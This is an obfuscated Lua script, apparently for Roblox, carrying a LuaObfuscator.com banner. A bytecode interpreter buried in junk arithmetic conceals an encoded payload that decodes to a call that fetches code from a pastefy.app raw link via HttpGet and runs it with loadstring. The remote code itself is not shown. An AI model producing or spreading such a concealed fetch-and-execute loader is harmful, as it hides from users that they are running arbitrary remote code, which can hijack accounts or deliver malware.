--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.10.9) ~  Much Love, Ferib 

]]--

local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function() return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...) local v18=1;local v19;v16=v4(v3(v16,5),"..",function(v30) if (v1(v30,2)==81) then local v82=0;while true do if (v82==0) then v19=v0(v3(v30,1,1));return "";end end else local v83=0;local v84;while true do if (v83==0) then v84=v2(v0(v30,16));if v19 then local v107=v5(v84,v19);v19=nil;return v107;else return v84;end break;end end end end);local function v20(v31,v32,v33) if v33 then local v85=0 -0 ;local v86;while true do if (v85==(0 -(0 + 0))) then v86=(v31/(2^(v32-((878 -(282 + 595)) -0))))%(2^(((v33-((1639 -(1523 + 114)) -1)) -(v32-1)) + (620 -(555 + 64)))) ;return v86-(v86%(932 -(771 + 86 + 74))) ;end end else local v87=2^(v32-(569 -(367 + 201))) ;return (((v31%(v87 + v87))>=v87) and (928 -(214 + 713))) or (0 + 0) ;end end local function v21() local v34=0 -0 ;local v35;while true do if (v34==(1 -0)) then return v35;end if (v34==(1065 -(68 + 997))) then v35=v1(v16,v18,v18);v18=v18 + (1271 -(226 + 232 + 812)) ;v34=1 + 0 ;end end end local function v22() local v36,v37=v1(v16,v18,v18 + (959 -(892 + 65)) );v18=v18 + (4 -2) ;return (v37 * 256) + v36 ;end local function v23() local v38=0;local v39;local v40;local v41;local v42;while true do if (v38==((0 -0) -0)) then v39,v40,v41,v42=v1(v16,v18,v18 + (4 -1) );v18=v18 + (354 -(87 + 263)) ;v38=181 -(67 + 113) ;end if (v38==1) then return (v42 * ((12303229 -(802 + 150)) + 4474939)) + (v41 * (160901 -95365)) + (v40 * (189 + (180 -113))) + v39 ;end end end local function v24() local v43=(0 + 0) -(0 + 0) ;local v44;local v45;local v46;local v47;local v48;local v49;while true do if (v43==(3 + 0)) then if (v48==((2052 -(87 + 968)) -(915 + 82))) then if (v47==((0 -0) -0)) then return v49 * (0 + 0 + 0) ;else v48=4 -3 ;v46=0 -0 ;end elseif (v48==(2691 -644)) then return ((v47==(1187 -(1069 + 118))) and (v49 * ((2 -1)/(1413 -(447 + 966))))) or (v49 * NaN) ;end return v8(v49,v48-(2237 -1214) ) * (v46 + (v47/((1 + 1)^(92 -40)))) ;end if (v43==(1 + 0)) then v46=1 + 0 ;v47=(v20(v45,886 -(261 + 624) ,35 -15 ) * ((2 + 0)^(823 -(368 + 423)))) + v44 ;v43=6 -4 ;end if (v43==(6 -4)) then v48=v20(v45,(106 -67) -((1827 -(1703 + 114)) + 8) ,119 -88 );v49=((v20(v45,474 -(416 + 26) )==(3 -2)) and  -(1 + 0)) or (1 -0) ;v43=441 -(145 + 293) ;end if (v43==(430 -(44 + 386))) then v44=v23();v45=v23();v43=1487 -(998 + 488) ;end end end local function v25(v50) local v51;if  not v50 then v50=v23();if (v50==(701 -(376 + 325))) then return "";end end v51=v3(v16,v18,(v18 + v50) -(1 -0) );v18=v18 + v50 ;local v52={};for v66=2 -1 , #v51 do v52[v66]=v2(v1(v3(v51,v66,v66)));end return v6(v52);end local v26=v23;local function v27(...) return {...},v12("#",...);end local function v28() local v53=(function() return 0;end)();local v54=(function() return;end)();local v55=(function() return;end)();local v56=(function() return;end)();local v57=(function() return;end)();local v58=(function() return;end)();local v59=(function() return;end)();while true do if (2==v53) then for v95= #" ",v23() do local v96=(function() return v21();end)();if (v20(v96, #"[", #"}")~=0) then else local v103=(function() return 0;end)();local v104=(function() return;end)();local v105=(function() return;end)();local v106=(function() return;end)();while true do if (v103~=(2 + 1)) then else if (v20(v105, #"xnx", #"-19")~= #",") then else v106[ #".com"]=(function() return v59[v106[ #".com"]];end)();end v54[v95]=(function() return v106;end)();break;end if (v103~=(123 -(17 + 104))) then else if (v20(v105, #"|", #".")~= #"[") then else v106[2]=(function() return v59[v106[2]];end)();end if (v20(v105,2 -0 ,2)~= #"<") then else v106[ #"gha"]=(function() return v59[v106[ #"gha"]];end)();end v103=(function() return 3 + 0 ;end)();end if (v103==1) then local v111=(function() return 0 + 0 ;end)();local v112=(function() return;end)();while true do if ((0 -0)~=v111) then else v112=(function() return 0;end)();while true do if (v112~=(0 -0)) then else local v163=(function() return 0;end)();while true do if (v163~=(0 + 0)) then else v106=(function() return {v22(),v22(),nil,nil};end)();if (v104==(1636 -(1373 + 263))) then local v166=(function() return 0;end)();local v167=(function() return;end)();while true do if (v166==(1000 -(451 + 549))) then v167=(function() return 0 + 0 ;end)();while true do if (v167==(0 -0)) then v106[ #"xnx"]=(function() return v22();end)();v106[ #"http"]=(function() return v22();end)();break;end end break;end end elseif (v104== #".") then v106[ #"gha"]=(function() return v23();end)();elseif (v104==2) then v106[ #"nil"]=(function() return v23() -((2 -0)^16) ;end)();elseif (v104~= #"91(") then else local v172=(function() return 0;end)();local v173=(function() return;end)();while true do if (0==v172) then v173=(function() return 0;end)();while true do if (v173==(1384 -(746 + 638))) then v106[ #"gha"]=(function() return v23() -(2^(7 + 9)) ;end)();v106[ #"asd1"]=(function() return v22();end)();break;end end break;end end end v163=(function() return 1 -0 ;end)();end if (v163~=1) then else v112=(function() return 342 -(218 + 123) ;end)();break;end end end if (v112==1) then v103=(function() return 1583 -(1535 + 46) ;end)();break;end end break;end end end if (v103==(0 + 0)) then local v113=(function() return 0;end)();while true do if (v113~=(1 + 0)) then else v103=(function() return 561 -(306 + 254) ;end)();break;end if (v113==(0 + 0)) then v104=(function() return v20(v96,3 -1 , #"gha");end)();v105=(function() return v20(v96, #"?id=",6);end)();v113=(function() return 1468 -(899 + 568) ;end)();end end end end end end for v97= #":",v23() do v55[v97-#"\\" ]=(function() return v28();end)();end return v57;end if ( #"/"==v53) then local v91=(function() return 0;end)();local v92=(function() return;end)();while true do if (v91==0) then v92=(function() return 0 + 0 ;end)();while true do if (v92~=(4 -2)) then else v53=(function() return 2;end)();break;end if ((604 -(268 + 335))==v92) then for v115= #"|",v58 do local v116=(function() return 290 -(60 + 230) ;end)();local v117=(function() return;end)();local v118=(function() return;end)();local v119=(function() return;end)();while true do if (v116==(573 -(426 + 146))) then v119=(function() return nil;end)();while true do if ((0 + 0)~=v117) then else local v164=(function() return 1456 -(282 + 1174) ;end)();while true do if (v164==(811 -(569 + 242))) then v118=(function() return v21();end)();v119=(function() return nil;end)();v164=(function() return 2 -1 ;end)();end if (v164==(1 + 0)) then v117=(function() return 1025 -(706 + 318) ;end)();break;end end end if (v117~=(1252 -(721 + 530))) then else if (v118== #"|") then v119=(function() return v21()~=(1271 -(945 + 326)) ;end)();elseif (v118==2) then v119=(function() return v24();end)();elseif (v118~= #"91(") then else v119=(function() return v25();end)();end v59[v115]=(function() return v119;end)();break;end end break;end if (v116~=(0 -0)) then else local v157=(function() return 0;end)();while true do if ((1 + 0)==v157) then v116=(function() return 1;end)();break;end if (v157==0) then v117=(function() return 0;end)();v118=(function() return nil;end)();v157=(function() return 1;end)();end end end end end v57[ #"91("]=(function() return v21();end)();v92=(function() return 2;end)();end if ((700 -(271 + 429))==v92) then v58=(function() return v23();end)();v59=(function() return {};end)();v92=(function() return 1 + 0 ;end)();end end break;end end end if (v53~=(1500 -(1408 + 92))) then else local v93=(function() return 1086 -(461 + 625) ;end)();local v94=(function() return;end)();while true do if (v93==(1288 -(993 + 295))) then v94=(function() return 0 + 0 ;end)();while true do if (v94~=(1171 -(418 + 753))) then else v54=(function() return {};end)();v55=(function() return {};end)();v94=(function() return 1;end)();end if (v94~=(1 + 0)) then else v56=(function() return {};end)();v57=(function() return {v54,v55,nil,v56};end)();v94=(function() return 2;end)();end if (v94~=2) then else v53=(function() return  #"\\";end)();break;end end break;end end end end end local function v29(v60,v61,v62) local v63=v60[1 + 0 ];local v64=v60[1 + 1 ];local v65=v60[532 -(406 + 123) ];return function(...) local v68=v63;local v69=v64;local v70=v65;local v71=v27;local v72=1770 -(1749 + 20) ;local v73= -(1 + 0);local v74={};local v75={...};local v76=v12("#",...) -(1 + 0) ;local v77={};local v78={};for v88=0 + 0 ,v76 do if (v88>=v70) then v74[v88-v70 ]=v75[v88 + 1 ];else v78[v88]=v75[v88 + 1 ];end end local v79=(v76-v70) + (1146 -(466 + 679)) ;local v80;local v81;while true do v80=v68[v72];v81=v80[(4 -2) -1 ];if (v81<=6) then if ((v81<=(5 -3)) or (4182>4845)) then if ((2322<=3546) and (v81<=(1900 -(106 + 1794)))) then do return;end elseif (v81>(1 + 0)) then local v120=v80[1 + 1 ];local v121,v122=v71(v78[v120](v13(v78,v120 + (2 -1) ,v80[3])));v73=(v122 + v120) -((4 -2) -1) ;local v123=114 -(4 + 110) ;for v149=v120,v73 do v123=v123 + (585 -(57 + 527)) ;v78[v149]=v121[v123];end else do return;end end elseif ((v81<=((2982 -(1126 + 425)) -((446 -(118 + 287)) + 1386))) or (2082==4773)) then if ((3244>1055) and (v81==3)) then v78[v80[(411 -306) -(17 + 86) ]]=v80[3 + 0 ];else local v126=v80[1123 -(118 + 1003) ];local v127=v78[v80[3]];v78[v126 + (1 -0) ]=v127;v78[v126]=v127[v80[11 -7 ]];end elseif (v81==(171 -(122 + 44))) then v78[v80[2]]();else local v131=v80[2 -0 ];local v132,v133=v71(v78[v131](v13(v78,v131 + (3 -2) ,v80[3 + 0 ])));v73=(v133 + v131) -(1 + 0) ;local v134=0 -(0 -0) ;for v152=v131,v73 do v134=v134 + 1 ;v78[v152]=v132[v134];end end elseif (v81<=(74 -((407 -(142 + 235)) + (158 -123)))) then if (v81<=7) then local v108=0 + 0 + 0 ;local v109;while true do if ((v108==(1257 -(1043 + 214))) or (3313<=1778)) then v109=v80[7 -(982 -(553 + 424)) ];v78[v109]=v78[v109](v13(v78,v109 + 1 ,v73));break;end end elseif (v81==(1220 -((610 -287) + 889))) then local v135=v80[5 -(3 + 0) ];v78[v135]=v78[v135](v13(v78,v135 + (581 -(361 + 219)) ,v73));else v78[v80[322 -(53 + 267) ]]=v80[1 + 2 ];end elseif (v81<=(424 -(15 + 395 + 3))) then if ((v81==(992 -(18 + 964))) or (1421>=2104)) then v78[v80[7 -5 ]]();else v78[v80[2 + 0 ]]=v62[v80[2 + 1 ]];end elseif ((1812<=3249) and (v81>(7 + 5))) then v78[v80[852 -(20 + 353 + 477) ]]=v62[v80[3 + 0 ]];else local v143=126 -(67 + 49 + 10) ;local v144;local v145;while true do if (v143==(1 + 0)) then v78[v144 + 1 ]=v145;v78[v144]=v145[v80[4]];break;end if (v143==(738 -(542 + 196))) then v144=v80[3 -1 ];v145=v78[v80[1 + 2 ]];v143=1 + 0 ;end end end v72=v72 + 1 ;end end;end return v29(v28(),{},v17)(...);end return v15("LOL!043Q00030A3Q006C6F6164737472696E6703043Q0067616D6503073Q00482Q747047657403203Q00682Q7470733A2Q2F706173746566792E612Q702F68787038656265482F72617700083Q00120D3Q00013Q00120D000100023Q00200C000100010003001209000300044Q0002000100034Q00085Q00022Q00053Q000100016Q00017Q00",v9(),...);
